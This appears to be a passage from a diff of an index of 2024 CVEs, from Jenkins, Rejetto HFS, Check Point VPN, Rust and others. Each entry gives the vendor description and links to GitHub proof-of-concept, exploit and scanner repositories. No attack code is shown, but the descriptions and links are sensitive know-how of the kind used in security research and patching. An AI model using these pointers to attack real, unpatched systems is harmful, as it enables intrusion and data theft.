[brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334) +- [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334) +- [s4botai/CVE-2024-23334-PoC](https://github.com/s4botai/CVE-2024-23334-PoC) +- [wizarddos/CVE-2024-23334](https://github.com/wizarddos/CVE-2024-23334) +- [Pylonet/CVE-2024-23334](https://github.com/Pylonet/CVE-2024-23334) +- [Arc4he/CVE-2024-23334-PoC](https://github.com/Arc4he/CVE-2024-23334-PoC) +- [TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC](https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC) + +### CVE-2024-23339 (2024-01-22) + +hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. + + +- [200101WhoAmI/CVE-2024-23339](https://github.com/200101WhoAmI/CVE-2024-23339) + +### CVE-2024-23346 (2024-02-21) + +Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue. + + +- [9carlo6/CVE-2024-23346](https://github.com/9carlo6/CVE-2024-23346) + +### CVE-2024-23443 (2024-06-19) + +A high-privileged user, allowed to create custom osquery packs 17 could affect the availability of Kibana by uploading a maliciously crafted osquery pack. + + +- [zhazhalove/osquery_cve-2024-23443](https://github.com/zhazhalove/osquery_cve-2024-23443) + +### CVE-2024-23652 (2024-01-31) + +BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature. + + +- [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652) + +### CVE-2024-23692 (2024-05-31) + +Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported. + + +- [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692) +- [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS) +- [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692) +- [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE) +- [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692) +- [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp) +- [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692) +- [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP) +- [pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692](https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692) +- [verylazytech/CVE-2024-23692](https://github.com/verylazytech/CVE-2024-23692) +- [XiaomingX/cve-2024-23692-poc](https://github.com/XiaomingX/cve-2024-23692-poc) + +### CVE-2024-23708 (2024-05-07) + +In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/CVE-2024-23708](https://github.com/uthrasri/CVE-2024-23708) + +### CVE-2024-23709 (2024-05-07) + +In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [AbrarKhan/external_sonivox_CVE-2024-23709](https://github.com/AbrarKhan/external_sonivox_CVE-2024-23709) + +### CVE-2024-23722 (2024-03-26) + +In Fluent Bit 2.1.8 through 2.2.1, a NULL pointer dereference can be caused via an invalid HTTP payload with the content type of x-www-form-urlencoded. It crashes and does not restart. This could result in logs not being delivered properly. + + +- [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc) + +### CVE-2024-23727 (2024-03-28) + +The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. + + +- [actuator/yi](https://github.com/actuator/yi) + +### CVE-2024-23738 (2024-01-28) + +An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.." + + +- [giovannipajeu1/CVE-2024-23738](https://github.com/giovannipajeu1/CVE-2024-23738) + +### CVE-2024-23739 (2024-01-28) + +An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. + + +- [giovannipajeu1/CVE-2024-23739](https://github.com/giovannipajeu1/CVE-2024-23739) + +### CVE-2024-23740 (2024-01-28) + +An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. + + +- [giovannipajeu1/CVE-2024-23740](https://github.com/giovannipajeu1/CVE-2024-23740) + +### CVE-2024-23741 (2024-01-28) + +An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. + + +- [giovannipajeu1/CVE-2024-23741](https://github.com/giovannipajeu1/CVE-2024-23741) + +### CVE-2024-23742 (2024-01-28) + +An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine. + + +- [giovannipajeu1/CVE-2024-23742](https://github.com/giovannipajeu1/CVE-2024-23742) + +### CVE-2024-23743 (2024-01-28) + +Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment." + + +- [giovannipajeu1/CVE-2024-23743](https://github.com/giovannipajeu1/CVE-2024-23743) + +### CVE-2024-23745 (2024-01-31) + +In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS. + + +- [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745) + +### CVE-2024-23746 (2024-02-02) + +Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents). + + +- [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746) + +### CVE-2024-23747 (2024-01-29) + +The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information. + + +- [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747) + +### CVE-2024-23772 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772) + +### CVE-2024-23773 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file delete vulnerability exists in the KSchedulerSvc.exe component. Local attackers can delete any file of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773) + +### CVE-2024-23774 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An unquoted Windows search path vulnerability exists in the KSchedulerSvc.exe and AMPTools.exe components. This allows local attackers to execute code of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774) + +### CVE-2024-23780 +- [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780) + +### CVE-2024-23897 (2024-01-24) + +Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. + + +- [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315) +- [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897) +- [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897) +- [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897) +- [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897) +- [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897) +- [3yujw7njai/CVE-2024-23897](https://github.com/3yujw7njai/CVE-2024-23897) +- [10T4/PoC-Fix-jenkins-rce_CVE-2024-23897](https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897) +- [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897) +- [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897) +- [r0xdeadbeef/CVE-2024-23897](https://github.com/r0xdeadbeef/CVE-2024-23897) +- [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897) +- [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897) +- [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897) +- [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE) +- [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-) +- [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897) +- [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability) +- [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897) +- [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897) +- [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897) +- [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897) +- [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read) +- [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897) +- [JAthulya/CVE-2024-23897](https://github.com/JAthulya/CVE-2024-23897) +- [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897) +- [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441) +- [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897) +- [Surko888/Surko-Exploit-Jenkins-CVE-2024-23897](https://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897) +- [cc3305/CVE-2024-23897](https://github.com/cc3305/CVE-2024-23897) +- [BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety](https://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety) +- [ShieldAuth-PHP/PBL05-CVE-Analsys](https://github.com/ShieldAuth-PHP/PBL05-CVE-Analsys) +- [verylazytech/CVE-2024-23897](https://github.com/verylazytech/CVE-2024-23897) + +### CVE-2024-23995 (2024-04-29) + +Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container. + + +- [EQSTLab/CVE-2024-23995](https://github.com/EQSTLab/CVE-2024-23995) + +### CVE-2024-23997 (2024-07-05) + +Lukas Bach yana =<1.0.16 is vulnerable to Cross Site Scripting (XSS) via src/electron-main.ts. + + +- [EQSTLab/CVE-2024-23997](https://github.com/EQSTLab/CVE-2024-23997) + +### CVE-2024-23998 (2024-07-05) + +goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.vue. + + +- [EQSTLab/CVE-2024-23998](https://github.com/EQSTLab/CVE-2024-23998) + +### CVE-2024-24034 (2024-02-08) + +Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code. + + +- [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034) + +### CVE-2024-24035 (2024-03-07) + +Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter. + + +- [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035) + +### CVE-2024-24134 (2024-01-29) + +Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section. + + +- [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134) + +### CVE-2024-24135 (2024-01-29) + +Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks. + + +- [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135) + +### CVE-2024-24136 (2024-01-29) + +The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks. + + +- [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136) + +### CVE-2024-24137 +- [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137) + +### CVE-2024-24138 +- [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138) + +### CVE-2024-24139 (2024-01-29) + +Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter. + + +- [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139) + +### CVE-2024-24140 (2024-01-29) + +Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.' + + +- [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140) + +### CVE-2024-24141 (2024-01-29) + +Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter. + + +- [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141) + +### CVE-2024-24142 (2024-02-13) + +Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter. + + +- [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142) + +### CVE-2024-24336 (2024-03-19) + +A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components. + + +- [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336) + +### CVE-2024-24337 (2024-02-12) + +CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components. + + +- [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337) + +### CVE-2024-24386 (2024-02-15) + +An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder. + + +- [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386) + +### CVE-2024-24396 (2024-02-05) + +Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component. + + +- [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396) + +### CVE-2024-24397 (2024-02-05) + +Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field. + + +- [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397) + +### CVE-2024-24398 (2024-02-06) + +Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function. + + +- [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398) + +### CVE-2024-24401 (2024-02-26) + +SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component. + + +- [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401) + +### CVE-2024-24402 (2024-02-26) + +An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component. + + +- [MAWK0235/CVE-2024-24402](https://github.com/MAWK0235/CVE-2024-24402) + +### CVE-2024-24409 (2024-11-08) + +Zohocorp ManageEngine ADManager Plus versions 7203 and prior are vulnerable to Privilege Escalation in the Modify Computers option. + + +- [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409) + +### CVE-2024-24488 (2024-02-07) + +An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component. + + +- [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488) + +### CVE-2024-24520 (2024-02-29) + +An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place. + + +- [xF-9979/CVE-2024-24520](https://github.com/xF-9979/CVE-2024-24520) + +### CVE-2024-24549 (2024-03-13) + +Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.\n\nUsers are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.\n\n + + +- [Abdurahmon3236/CVE-2024-24549](https://github.com/Abdurahmon3236/CVE-2024-24549) + +### CVE-2024-24576 (2024-04-09) + +Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.\n\nThe `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.\n\nOn Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.\n\nOne exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.\n\nDue to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.\n\nThe fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic. + + +- [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC) +- [brains93/CVE-2024-24576-PoC-Python](https://github.com/brains93/CVE-2024-24576-PoC-Python) +- [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit) +- [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim) +- [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo) +- [mishl-dev/CVE-2024-24576-PoC-Python](https://github.com/mishl-dev/CVE-2024-24576-PoC-Python) +- [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl) +- [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust) +- [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut) + +### CVE-2024-24590 (2024-02-06) + +Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n + + +- [OxyDeV2/ClearML-CVE-2024-24590](https://github.com/OxyDeV2/ClearML-CVE-2024-24590) +- [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit) +- [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC) +- [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590) +- [sviim/ClearML-CVE-2024-24590-RCE](https://github.com/sviim/ClearML-CVE-2024-24590-RCE) +- [Bigb972003/cve-2024-24590](https://github.com/Bigb972003/cve-2024-24590) +- [j3r1ch0123/CVE-2024-24590](https://github.com/j3r1ch0123/CVE-2024-24590) + +### CVE-2024-24684 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the header parsing occuring while processing an `.off` file via the `readOFF` function. \r\n\r\n\r\nWe can see above that at [0] a stack-based buffer called `comment` is defined with an hardcoded size of `1000 bytes`. The call to `fscanf` at [1] is unsafe and if the first line of the header of the `.off` files is longer than 1000 bytes it will overflow the `header` buffer. + + +- [SpiralBL0CK/CVE-2024-24684](https://github.com/SpiralBL0CK/CVE-2024-24684) + +### CVE-2024-24685 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the vertex section of an `.off` file processed via the `readOFF` function. + + +- [SpiralBL0CK/CVE-2024-24685](https://github.com/SpiralBL0CK/CVE-2024-24685) + +### CVE-2024-24686 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the faces section of an `.off` file processed via the `readOFF` function. + + +- [SpiralBL0CK/CVE-2024-24686](https://github.com/SpiralBL0CK/CVE-2024-24686) + +### CVE-2024-24725 (2024-03-23) + +Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI. + + +- [MelkorW/CVE-2024-24725-PoC](https://github.com/MelkorW/CVE-2024-24725-PoC) + +### CVE-2024-24760 (2024-02-02) + +mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`. + + +- [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760) + +### CVE-2024-24787 (2024-05-08) + +On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive. + + +- [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC) + +### CVE-2024-24809 (2024-04-10) + +Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue. + + +- [gh-ost00/CVE-2024-24809-Proof-of-concept](https://github.com/gh-ost00/CVE-2024-24809-Proof-of-concept) + +### CVE-2024-24816 (2024-02-07) + +CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts. + + +- [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816) + +### CVE-2024-24919 (2024-05-28) + +Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available. + + +- [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919) +- [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919) +- [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919) +- [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919) +- [yagyuufellinluvv/CVE-2024-24919](https://github.com/yagyuufellinluvv/CVE-2024-24919) +- [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919) +- [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919) +- [P3wc0/CVE-2024-24919](https://github.com/P3wc0/CVE-2024-24919) +- [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919) +- [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919) +- [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919) +- [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919) +- [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC) +- [0xYumeko/CVE-2024-24919](https://github.com/0xYumeko/CVE-2024-24919) +- [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN) +- [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater) +- [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919) +- [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919) +- [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919) +- [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919) +- [0xkalawy/CVE-2024-24919](https://github.com/0xkalawy/CVE-2024-24919) +- [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919) +- [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919) +- [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919) +- [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919) +- [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919) +- [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner) +- [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check) +- [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN) +- 